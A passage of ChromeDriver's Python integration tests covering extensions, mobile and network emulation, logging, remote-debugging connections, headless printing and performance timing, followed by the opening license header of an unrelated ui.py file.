      if driver.GetCurrentUrl() == 'chrome-extension://' \
          'nibbphkelpaohebejnbojjalikodckih/_generated_background_page.html':
        self.assertEqual(42, driver.ExecuteScript('return magic;'))
        return
    self.fail("couldn't find generated background page for test extension")

  def testIFrameWithExtensionsSource(self):
    crx_path = os.path.join(_TEST_DATA_DIR, 'frames_extension.crx')
    driver = self.CreateDriver(
        chrome_extensions=[self._PackExtension(crx_path)])
    driver.Load(
        ChromeDriverTest._http_server.GetUrl() +
        '/chromedriver/iframe_extension.html')
    driver.SwitchToFrame('testframe')
    element = driver.FindElement('css selector', '#p1')
    self.assertEqual('Its a frame with extension source', element.GetText())

  def testDontExecuteScriptsInContentScriptContext(self):
    # This test extension has a content script which runs in all frames (see
    # https://developer.chrome.com/extensions/content_scripts) which causes
    # each frame on the page to be associated with multiple JS execution
    # contexts. Make sure that ExecuteScript operates on the page's context,
    # rather than the extension's content script's one.
    extension_path = os.path.join(_TEST_DATA_DIR, 'all_frames')
    driver = self.CreateDriver(
        chrome_switches=['load-extension=%s' % extension_path])
    driver.Load(
        ChromeDriverTest._http_server.GetUrl() +
        '/chromedriver/container.html')
    driver.SwitchToMainFrame()
    self.assertEqual('one',
                     driver.ExecuteScript("return window['global_var']"))
    driver.SwitchToFrame('iframe')
    self.assertEqual('two',
                     driver.ExecuteScript("return window['iframe_var']"))


class ChromeLogPathCapabilityTest(ChromeDriverBaseTest):
  """Tests that chromedriver properly processes chromeOptions.logPath."""

  LOG_MESSAGE = 'Welcome to ChromeLogPathCapabilityTest!'

  def testChromeLogPath(self):
    """Checks that user can specify the path of the chrome log.

    Verifies that a log message is written into the specified log file.
    """
    tmp_log_path = tempfile.NamedTemporaryFile()
    driver = self.CreateDriver(chrome_log_path=tmp_log_path.name)
    driver.ExecuteScript('console.info("%s")' % self.LOG_MESSAGE)
    driver.Quit()
    self.assertTrue(self.LOG_MESSAGE in open(tmp_log_path.name).read())


class MobileEmulationCapabilityTest(ChromeDriverBaseTestWithWebServer):
  """Tests that ChromeDriver processes chromeOptions.mobileEmulation.

  Makes sure the device metrics are overridden in DevTools and user agent is
  overridden in Chrome.
  """

  # Run in Legacy mode
  def testDeviceMetricsWithStandardWidth(self):
    driver = self.CreateDriver(
        send_w3c_capability=False,
        send_w3c_request=False,
        mobile_emulation = {
            'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
            'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 '
                         'Build/JOP40D) AppleWebKit/535.19 (KHTML, like '
                         'Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'
        })
    # Emulated metrics win over the (larger) window size set here.
    driver.SetWindowRect(600, 400, None, None)
    driver.Load(self._http_server.GetUrl() + '/userAgent')
    self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
    self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
    self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))

  # Run in Legacy mode
  def testDeviceMetricsWithDeviceWidth(self):
    driver = self.CreateDriver(
        send_w3c_capability=False,
        send_w3c_request=False,
        mobile_emulation = {
            'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
            'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 '
                         'Build/JOP40D) AppleWebKit/535.19 (KHTML, like '
                         'Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19'
        })
    driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
    self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
    self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
    self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))

  def testUserAgent(self):
    # The page echoes the request's User-Agent header into its body.
    driver = self.CreateDriver(
        mobile_emulation = {'userAgent': 'Agent Smith'})
    driver.Load(self._http_server.GetUrl() + '/userAgent')
    body_tag = driver.FindElement('tag name', 'body')
    self.assertEqual("Agent Smith", body_tag.GetText())

  def testDeviceName(self):
    # Naming a known device implies both its metrics and its user agent.
    driver = self.CreateDriver(
        mobile_emulation = {'deviceName': 'Nexus 5'})
    driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
    self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
    self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
    body_tag = driver.FindElement('tag name', 'body')
    # The Chrome version number varies, so only pin the prefix and suffix of
    # the emulated Nexus 5 user agent string.
    self.assertRegexpMatches(
        body_tag.GetText(),
        '^' + re.escape('Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/') +
        r'\d+\.\d+\.\d+\.\d+' + re.escape(' Mobile Safari/537.36') + '$')

  def testSendKeysToElement(self):
    driver = self.CreateDriver(
        mobile_emulation = {'deviceName': 'Nexus 5'})
    text = driver.ExecuteScript(
        'document.body.innerHTML = \'<input type="text">\';'
        'var input = document.getElementsByTagName("input")[0];'
        'input.addEventListener("change", function() {'
        '  document.body.appendChild(document.createElement("br"));'
        '});'
        'return input;')
    text.SendKeys('0123456789+-*/ Hi')
    text.SendKeys(', there!')
    value = driver.ExecuteScript('return arguments[0].value;', text)
    self.assertEquals('0123456789+-*/ Hi, there!', value)

  def testClickElement(self):
    driver = self.CreateDriver(
        mobile_emulation = {'deviceName': 'Nexus 5'})
    driver.Load('about:blank')
    div = driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.addEventListener("click", function() {'
        '  div.innerHTML="new<br>";'
        '});'
        'return div;')
    div.Click()
    self.assertEquals(1, len(driver.FindElements('tag name', 'br')))

  # Run in Legacy mode
  def testTapElement(self):
    # SingleTap should dispatch touch events under mobile emulation.
    driver = self.CreateDriver(
        send_w3c_capability=False,
        send_w3c_request=False,
        mobile_emulation = {'deviceName': 'Nexus 5'})
    driver.Load('about:blank')
    div = driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.addEventListener("touchstart", function() {'
        '  div.innerHTML="new<br>";'
        '});'
        'return div;')
    div.SingleTap()
    self.assertEquals(1, len(driver.FindElements('tag name', 'br')))

  def testNetworkConnectionDisabledByDefault(self):
    driver = self.CreateDriver()
    self.assertFalse(driver.capabilities['networkConnectionEnabled'])
def testNetworkConnectionUnsupported(self): driver = self.CreateDriver() # Network connection capability must be enabled to set/retrieve self.assertRaises(chromedriver.UnknownError, driver.GetNetworkConnection) self.assertRaises(chromedriver.UnknownError, driver.SetNetworkConnection, 0x1) # Run in Legacy mode def testNetworkConnectionEnabled(self): # mobileEmulation must be enabled for networkConnection to be enabled driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True, send_w3c_capability=False, send_w3c_request=False) self.assertTrue(driver.capabilities['mobileEmulationEnabled']) self.assertTrue(driver.capabilities['networkConnectionEnabled']) def testEmulateNetworkConnection4g(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Test 4G connection. connection_type = 0x8 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testEmulateNetworkConnectionMultipleBits(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Connection with 4G, 3G, and 2G bits on. # Tests that 4G takes precedence. connection_type = 0x38 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testWifiAndAirplaneModeEmulation(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Connection with both Wifi and Airplane Mode on. # Tests that Wifi takes precedence over Airplane Mode. 
connection_type = 0x3 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testNetworkConnectionTypeIsAppliedToAllTabsImmediately(self): def respondWithString(request): return {}, """ <html> <body>%s</body> </html>""" % "hello world!" self._http_server.SetCallbackForPath( '/helloworld', respondWithString) driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Set network to online connection_type = 0x10 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) # Open a window with two divs counting successful + unsuccessful # attempts to complete XML task driver.Load( self._http_server.GetUrl() +'/chromedriver/xmlrequest_test.html') window1_handle = driver.GetCurrentWindowHandle() old_handles = driver.GetWindowHandles() driver.FindElement('css selector', '#requestButton').Click() driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(driver, old_handles) self.assertNotEqual(None, new_window_handle) driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle()) # Set network to offline to determine whether the XML task continues to # run in the background, indicating that the conditions are only applied # to the current WebView connection_type = 0x1 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) driver.SwitchToWindow(window1_handle) connection_type = 0x1 def testNetworkConnectionTypeIsAppliedToAllTabs(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) driver.Load(self._http_server.GetUrl() +'/chromedriver/page_test.html') window1_handle = driver.GetCurrentWindowHandle() old_handles = driver.GetWindowHandles() # Test connection 
is offline. connection_type = 0x1; returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) # Navigate to another window. driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(driver, old_handles) self.assertNotEqual(None, new_window_handle) driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle()) self.assertRaises( chromedriver.NoSuchElement, driver.FindElement, 'css selector', '#link') # Set connection to 3G in second window. connection_type = 0x10; returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) driver.SwitchToWindow(window1_handle) self.assertEquals(window1_handle, driver.GetCurrentWindowHandle()) # Test whether first window has old or new network conditions. network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testDefaultComplianceMode(self): driver = self.CreateDriver(send_w3c_capability=None, send_w3c_request=True) self.assertTrue(driver.w3c_compliant) def testW3cCompliantResponses(self): # It's an error to send Legacy format request # without Legacy capability flag. with self.assertRaises(chromedriver.InvalidArgument): self.CreateDriver(send_w3c_request=False) # It's an error to send Legacy format capability # without Legacy request flag. with self.assertRaises(chromedriver.SessionNotCreated): self.CreateDriver(send_w3c_capability=False) # Can enable W3C capability in a W3C format request. driver = self.CreateDriver(send_w3c_capability=True) self.assertTrue(driver.w3c_compliant) # Can enable W3C request in a legacy format request. driver = self.CreateDriver(send_w3c_request=True) self.assertTrue(driver.w3c_compliant) # Asserts that errors are being raised correctly in the test client # with a W3C compliant driver. 
self.assertRaises(chromedriver.UnknownError, driver.GetNetworkConnection) # Can set Legacy capability flag in a Legacy format request. driver = self.CreateDriver(send_w3c_capability=False, send_w3c_request=False) self.assertFalse(driver.w3c_compliant) class ChromeDriverLogTest(ChromeDriverBaseTest): """Tests that chromedriver produces the expected log file.""" UNEXPECTED_CHROMEOPTION_CAP = 'unexpected_chromeoption_capability' LOG_MESSAGE = 'unrecognized chrome option: %s' % UNEXPECTED_CHROMEOPTION_CAP def testChromeDriverLog(self): _, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_') chromedriver_server = server.Server( _CHROMEDRIVER_BINARY, log_path=tmp_log_path) try: driver = chromedriver.ChromeDriver( chromedriver_server.GetUrl(), chromedriver_server.GetPid(), chrome_binary=_CHROME_BINARY, experimental_options={ self.UNEXPECTED_CHROMEOPTION_CAP : 1 }) driver.Quit() except chromedriver.ChromeDriverException, e: self.assertTrue(self.LOG_MESSAGE in e.message) finally: chromedriver_server.Kill() with open(tmp_log_path, 'r') as f: self.assertTrue(self.LOG_MESSAGE in f.read()) def testDisablingDriverLogsSuppressesChromeDriverLog(self): _, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_') chromedriver_server = server.Server( _CHROMEDRIVER_BINARY, log_path=tmp_log_path, verbose=False) try: driver = self.CreateDriver( chromedriver_server.GetUrl(), logging_prefs={'driver':'OFF'}) driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html') driver.AddCookie({'name': 'secret_code', 'value': 'bosco'}) driver.Quit() finally: chromedriver_server.Kill() with open(tmp_log_path, 'r') as f: self.assertNotIn('bosco', f.read()) class ChromeLoggingCapabilityTest(ChromeDriverBaseTest): """Tests chromedriver tracing support and Inspector event collection.""" def testPerformanceLogger(self): driver = self.CreateDriver( experimental_options={'perfLoggingPrefs': { 'traceCategories': 'blink.console' }}, logging_prefs={'performance':'ALL'}) 
driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html') # Mark the timeline; later we will verify the marks appear in the trace. driver.ExecuteScript('console.time("foobar")') driver.ExecuteScript('console.timeEnd("foobar")') logs = driver.GetLog('performance') driver.Quit() marked_timeline_events = [] seen_log_domains = {} for entry in logs: devtools_message = json.loads(entry['message'])['message'] method = devtools_message['method'] domain = method[:method.find('.')] seen_log_domains[domain] = True if method != 'Tracing.dataCollected': continue self.assertTrue('params' in devtools_message) self.assertTrue(isinstance(devtools_message['params'], dict)) cat = devtools_message['params'].get('cat', '') if (cat == 'blink.console' and devtools_message['params']['name'] == 'foobar'): marked_timeline_events.append(devtools_message) self.assertEquals(2, len(marked_timeline_events)) self.assertEquals({'Network', 'Page', 'Tracing'}, set(seen_log_domains.keys())) def testDevToolsEventsLogger(self): """Tests that the correct event type (and no other) is logged""" event = 'Page.loadEventFired' driver = self.CreateDriver( devtools_events_to_log=[event], logging_prefs={'devtools':'ALL'}) driver.Load('about:blank') logs = driver.GetLog('devtools') for entry in logs: devtools_message = json.loads(entry['message']) method = devtools_message['method'] self.assertTrue('params' in devtools_message) self.assertEquals(event, method) class SessionHandlingTest(ChromeDriverBaseTest): """Tests for session operations.""" def testQuitASessionMoreThanOnce(self): driver = self.CreateDriver() driver.Quit() driver.Quit() def testGetSessions(self): driver = self.CreateDriver() response = driver.GetSessions() self.assertEqual(1, len(response)) driver2 = self.CreateDriver() response = driver2.GetSessions() self.assertEqual(2, len(response)) class RemoteBrowserTest(ChromeDriverBaseTest): """Tests for ChromeDriver remote browser capability.""" def setUp(self): 
self.assertTrue(_CHROME_BINARY is not None, 'must supply a chrome binary arg') def testConnectToRemoteBrowser(self): # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = ports_generator.next() temp_dir = util.MakeTempDir() print 'temp dir is ' + temp_dir cmd = [_CHROME_BINARY, '--remote-debugging-port=%d' % port, '--user-data-dir=%s' % temp_dir, '--use-mock-keychain'] process = subprocess.Popen(cmd) try: driver = self.CreateDriver(debugger_address='localhost:%d' % port) driver.ExecuteScript('console.info("%s")' % 'connecting at %d!' % port) driver.Quit() except: continue finally: if process.poll() is None: process.terminate() # Wait for Chrome to exit here to prevent a race with Chrome to # delete/modify the temporary user-data-dir. # Maximum wait ~1 second. for _ in range(20): if process.poll() is not None: break print 'continuing to wait for Chrome to exit' time.sleep(.05) else: process.kill() break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. def testConnectToRemoteBrowserLiteralAddressHeadless(self): debug_addrs = ['127.0.0.1', '::1'] debug_url_addrs = ['127.0.0.1', '[::1]'] for (debug_addr, debug_url_addr) in zip(debug_addrs, debug_url_addrs): # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = ports_generator.next() temp_dir = util.MakeTempDir() print 'temp dir is ' + temp_dir cmd = [_CHROME_BINARY, '--headless', '--remote-debugging-address=%s' % debug_addr, '--remote-debugging-port=%d' % port, '--user-data-dir=%s' % temp_dir, '--use-mock-keychain'] process = subprocess.Popen(cmd) try: driver = self.CreateDriver( debugger_address='%s:%d' % (debug_url_addr, port)) driver.ExecuteScript( 'console.info("%s")' % 'connecting at %d!' 
% port) driver.Quit() except: continue finally: if process.poll() is None: process.terminate() # Wait for Chrome to exit here to prevent a race with Chrome to # delete/modify the temporary user-data-dir. # Maximum wait ~1 second. for _ in range(20): if process.poll() is not None: break print 'continuing to wait for Chrome to exit' time.sleep(.05) else: process.kill() break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. class LaunchDesktopTest(ChromeDriverBaseTest): """Tests that launching desktop Chrome works.""" def testExistingDevToolsPortFile(self): """If a DevTools port file already exists before startup, then we should ignore it and get our debug port number from the new file.""" user_data_dir = tempfile.mkdtemp() try: dev_tools_port_file = os.path.join(user_data_dir, 'DevToolsActivePort') with open(dev_tools_port_file, 'w') as fd: fd.write('34\n/devtools/browser/2dab5fb1-5571-40d8-a6ad-98823bc5ff84') driver = self.CreateDriver( chrome_switches=['user-data-dir=' + user_data_dir]) with open(dev_tools_port_file, 'r') as fd: port = int(fd.readlines()[0]) # Ephemeral ports are always high numbers. self.assertTrue(port > 100) finally: shutil.rmtree(user_data_dir, ignore_errors=True) def testHelpfulErrorMessage_NormalExit(self): """If Chrome fails to start, we should provide a useful error message.""" if util.IsWindows(): # Not bothering implementing a Windows test since then I would have # to implement Windows-specific code for a program that quits and ignores # any arguments. Linux and Mac should be good enough coverage. 
return file_descriptor, path = tempfile.mkstemp() try: os.write(file_descriptor, '#!/bin/bash\nexit 0') os.close(file_descriptor) os.chmod(path, 0777) exception_raised = False try: driver = chromedriver.ChromeDriver(_CHROMEDRIVER_SERVER_URL, _CHROMEDRIVER_SERVER_PID, chrome_binary=path, test_name=self.id()) except Exception as e: self.assertIn('Chrome failed to start', e.message) self.assertIn('exited normally', e.message) self.assertIn('ChromeDriver is assuming that Chrome has crashed', e.message) exception_raised = True self.assertTrue(exception_raised) try: driver.Quit() except: pass finally: pass os.remove(path) def testNoBinaryErrorMessage(self): temp_dir = tempfile.mkdtemp() exception_raised = False try: driver = chromedriver.ChromeDriver( _CHROMEDRIVER_SERVER_URL, _CHROMEDRIVER_SERVER_PID, chrome_binary=os.path.join(temp_dir, 'this_file_should_not_exist'), test_name=self.id()) except Exception as e: self.assertIn('no chrome binary', e.message) exception_raised = True finally: shutil.rmtree(temp_dir) self.assertTrue(exception_raised) class PerfTest(ChromeDriverBaseTest): """Tests for ChromeDriver perf.""" def _RunDriverPerfTest(self, name, test_func): """Runs a perf test ChromeDriver server. Args: name: The name of the perf test. test_func: Called with the server url to perform the test action. Must return the time elapsed. """ result = [] for iteration in range(10): result += [test_func(_CHROMEDRIVER_SERVER_URL)] def PrintResult(result): mean = sum(result) / len(result) avg_dev = sum([abs(sample - mean) for sample in result]) / len(result) print 'perf result', name, mean, avg_dev, result util.AddBuildStepText('%s: %.3f+-%.3f' % ( name, mean, avg_dev)) # Discard first result, which may be off due to cold start. 
    # Discard first result, which may be off due to cold start.
    PrintResult(result[1:])

  def testSessionStartTime(self):
    # Measures wall time from session-create request to a usable driver.
    def Run(url):
      start = monotonic()
      driver = self.CreateDriver(url)
      end = monotonic()
      driver.Quit()
      return end - start
    self._RunDriverPerfTest('session start', Run)

  def testSessionStopTime(self):
    # Measures wall time of Quit alone; session creation is outside timing.
    def Run(url):
      driver = self.CreateDriver(url)
      start = monotonic()
      driver.Quit()
      end = monotonic()
      return end - start
    self._RunDriverPerfTest('session stop', Run)

  def testColdExecuteScript(self):
    # Measures the first ExecuteScript on a fresh session ("cold" path,
    # before any script-evaluation state is warmed up).
    def Run(url):
      driver = self.CreateDriver(url)
      start = monotonic()
      driver.ExecuteScript('return 1')
      end = monotonic()
      driver.Quit()
      return end - start
    self._RunDriverPerfTest('cold exe js', Run)


class HeadlessInvalidCertificateTest(ChromeDriverBaseTestWithWebServer):
  """End to end tests for ChromeDriver."""

  @staticmethod
  def GetHttpsUrlForFile(file_path):
    # Serves the file over the HTTPS test server, whose certificate is
    # intentionally invalid; accept_insecure_certs below makes loads succeed.
    return (
        HeadlessInvalidCertificateTest._https_server.GetUrl() + file_path)

  def setUp(self):
    self._driver = self.CreateDriver(chrome_switches = ["--headless"],
                                     accept_insecure_certs = True)

  def testLoadsPage(self):
    print "loading"
    self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html'))
    # Verify that page content loaded.
    self._driver.FindElement('css selector', '#link')

  def testNavigateNewWindow(self):
    print "loading"
    self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html'))
    # Point the link at a same-origin page so the new window also hits the
    # invalid-cert HTTPS server.
    self._driver.ExecuteScript(
        'document.getElementById("link").href = "page_test.html";')

    old_handles = self._driver.GetWindowHandles()
    self._driver.FindElement('css selector', '#link').Click()
    new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
    self.assertNotEqual(None, new_window_handle)
    self._driver.SwitchToWindow(new_window_handle)
    self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
    # Verify that page content loaded in new window.
self._driver.FindElement('css selector', '#link') class HeadlessChromeDriverTest(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver.""" def setUp(self): self._driver = self.CreateDriver(chrome_switches=['--headless']) def _newWindowDoesNotFocus(self, window_type='window'): current_handles = self._driver.GetWindowHandles() self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/focus_blur_test.html')) new_window = self._driver.NewWindow(window_type=window_type) text = self._driver.FindElement('css selector', '#result').GetText() self.assertTrue(new_window['handle'] not in current_handles) self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles()) self.assertEquals(text, 'PASS') def testNewWindowDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='window') def testNewTabDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='tab') def testWindowFullScreen(self): old_rect_list = self._driver.GetWindowRect() # Testing the resulting screensize doesn't work in headless, because there # is no screen to give a size. # We just want to ensure this command doesn't timeout or error. 
self._driver.FullScreenWindow() # Restore a known size so next tests won't fail self._driver.SetWindowRect(*old_rect_list) def testPrintHeadless(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) pdf = self._driver.PrintPDF({ 'orientation': 'landscape', 'scale': 1.1, 'margin': { 'top': 1.1, 'bottom': 2.2, 'left': 3.3, 'right': 4.4 }, 'background': True, 'shrinkToFit': False, 'pageRanges': [1], 'page': { 'width': 15.6, 'height': 20.6 } }) decoded_pdf = base64.b64decode(pdf) self.assertTrue(decoded_pdf.startswith("%PDF")) self.assertTrue(decoded_pdf.endswith("%%EOF")) def testPrintInvalidArgumentHeadless(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self.assertRaises(chromedriver.InvalidArgument, self._driver.PrintPDF, {'pageRanges': ['x-y']}) class SupportIPv4AndIPv6(ChromeDriverBaseTest): def testSupportIPv4AndIPv6(self): has_ipv4 = False has_ipv6 = False for info in socket.getaddrinfo('localhost', 0): if info[0] == socket.AF_INET: has_ipv4 = True if info[0] == socket.AF_INET6: has_ipv6 = True if has_ipv4: self.CreateDriver("http://127.0.0.1:" + str(chromedriver_server.GetPort())) if has_ipv6: self.CreateDriver('http://[::1]:' + str(chromedriver_server.GetPort())) class JavaScriptTests(ChromeDriverBaseTestWithWebServer): def GetFileUrl(self, filename): return 'file://' + self.js_root + filename def setUp(self): self._driver = self.CreateDriver() self.js_root = os.path.dirname(os.path.realpath(__file__)) + '/../js/' self._driver.SetWindowRect(640, 480, 0, 0) def checkTestResult(self): def getStatus(): return self._driver.ExecuteScript('return window.CDCJStestRunStatus') self.WaitForCondition(getStatus) self.assertEquals('PASS', getStatus()) def testAllJS(self): self._driver.Load(self.GetFileUrl('call_function_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('dispatch_touch_event_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('execute_async_script_test.html')) 
self.checkTestResult() self._driver.Load(self.GetFileUrl('execute_script_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('get_element_location_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('get_element_region_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('is_option_element_toggleable_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('focus_test.html')) self.checkTestResult() # 'Z' in the beginning is to make test executed in the end of suite. class ZChromeStartRetryCountTest(unittest.TestCase): def testChromeStartRetryCount(self): self.assertEquals(0, chromedriver.ChromeDriver.retry_count, "Chrome was retried to start during suite execution " "in following tests:\n" + ', \n'.join(chromedriver.ChromeDriver.retried_tests)) if __name__ == '__main__': parser = optparse.OptionParser() parser.add_option( '', '--chromedriver', help='Path to chromedriver server (REQUIRED!)') parser.add_option( '', '--log-path', help='Output verbose server logs to this file') parser.add_option( '', '--replayable', help="Don't truncate long strings in the log so that the log can be " "replayed.") parser.add_option( '', '--chrome', help='Path to a build of the chrome binary') parser.add_option( '', '--filter', type='string', default='', help='Filter for specifying what tests to run, \"*\" will run all,' 'including tests excluded by default. E.g., *testRunMethod') parser.add_option( '', '--android-package', help=('Android package key. Possible values: ' + str(_ANDROID_NEGATIVE_FILTER.keys()))) parser.add_option( '', '--isolated-script-test-output', help='JSON output file used by swarming') parser.add_option( '', '--test-type', help='Select type of tests to run. 
Possible value: integration') options, args = parser.parse_args() if options.chromedriver is None: parser.error('--chromedriver is required.\n' + 'Please run "%s --help" for help' % __file__) options.chromedriver = util.GetAbsolutePathOfUserPath(options.chromedriver) if (not os.path.exists(options.chromedriver) and util.GetPlatformName() == 'win' and not options.chromedriver.lower().endswith('.exe')): options.chromedriver = options.chromedriver + '.exe' if not os.path.exists(options.chromedriver): parser.error('Path given by --chromedriver is invalid.\n' + 'Please run "%s --help" for help' % __file__) if options.replayable and not options.log_path: parser.error('Need path specified when replayable log set to true.') # When running in commit queue & waterfall, minidump will need to write to # same directory as log, so use the same path global _MINIDUMP_PATH if options.log_path: _MINIDUMP_PATH = os.path.dirname(options.log_path) global _CHROMEDRIVER_BINARY _CHROMEDRIVER_BINARY = util.GetAbsolutePathOfUserPath(options.chromedriver) if (options.android_package and options.android_package not in _ANDROID_NEGATIVE_FILTER): parser.error('Invalid --android-package') global chromedriver_server chromedriver_server = server.Server(_CHROMEDRIVER_BINARY, options.log_path, replayable=options.replayable) global _CHROMEDRIVER_SERVER_PID _CHROMEDRIVER_SERVER_PID = chromedriver_server.GetPid() global _CHROMEDRIVER_SERVER_URL _CHROMEDRIVER_SERVER_URL = chromedriver_server.GetUrl() global _CHROME_BINARY if options.chrome: _CHROME_BINARY = util.GetAbsolutePathOfUserPath(options.chrome) else: # In some test environments (such as commit queue), it's not convenient to # specify Chrome binary location on the command line. Try to use heuristics # to locate the Chrome binary next to the ChromeDriver binary. 
driver_path = os.path.dirname(_CHROMEDRIVER_BINARY) chrome_path = None platform = util.GetPlatformName() if platform == 'linux': chrome_path = os.path.join(driver_path, 'chrome') elif platform == 'mac': if os.path.exists(os.path.join(driver_path, 'Google Chrome.app')): chrome_path = os.path.join(driver_path, 'Google Chrome.app', 'Contents', 'MacOS', 'Google Chrome') else: chrome_path = os.path.join(driver_path, 'Chromium.app', 'Contents', 'MacOS', 'Chromium') elif platform == 'win': chrome_path = os.path.join(driver_path, 'chrome.exe') if chrome_path is not None and os.path.exists(chrome_path): _CHROME_BINARY = chrome_path else: _CHROME_BINARY = None global _ANDROID_PACKAGE_KEY _ANDROID_PACKAGE_KEY = options.android_package if _ANDROID_PACKAGE_KEY: devil_chromium.Initialize() if options.filter == '': if _ANDROID_PACKAGE_KEY: negative_filter = _ANDROID_NEGATIVE_FILTER[_ANDROID_PACKAGE_KEY] else: negative_filter = _GetDesktopNegativeFilter() if options.test_type is not None: if options.test_type == 'integration': negative_filter += _INTEGRATION_NEGATIVE_FILTER else: parser.error('Invalid --test-type. 
Valid value: integration') options.filter = '*-' + ':__main__.'.join([''] + negative_filter) all_tests_suite = unittest.defaultTestLoader.loadTestsFromModule( sys.modules[__name__]) test_suite = unittest_util.FilterTestSuite(all_tests_suite, options.filter) test_suites = [test_suite] ChromeDriverBaseTestWithWebServer.GlobalSetUp() runner = unittest.TextTestRunner( stream=sys.stdout, descriptions=False, verbosity=2, resultclass=unittest_util.AddSuccessTextTestResult) result = runner.run(test_suite) results = [result] num_failed = len(result.failures) + len(result.errors) # Limit fail tests to 10 to avoid real bug causing many tests to fail # Only enable retry for automated bot test if (num_failed > 0 and num_failed <= 10 and options.test_type == 'integration'): retry_test_suite = unittest.TestSuite() for f in result.failures: retry_test_suite.addTest(f[0]) for e in result.errors: retry_test_suite.addTest(e[0]) test_suites.append(retry_test_suite) print '\nRetrying failed tests\n' retry_result = runner.run(retry_test_suite) results.append(retry_result) ChromeDriverBaseTestWithWebServer.GlobalTearDown() if options.isolated_script_test_output: util.WriteResultToJSONFile(test_suites, results, options.isolated_script_test_output) util.TryUploadingResultToResultSink(results) sys.exit(len(results[-1].failures) + len(results[-1].errors))
# ======================= file: ui.py =======================
# -*- coding: utf-8 -*-
# Copyright 2012 Harald Schilly <harald.schilly@univie.ac.at>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

r"""
User Interface
--------------

This draws a window and plots graphs.

.. figure:: img/ui1.png
   :scale: 75 %

"""
from threading import Thread
from .core import Module

# pygtk/gtk are optional at import time: when they are missing (e.g. on a
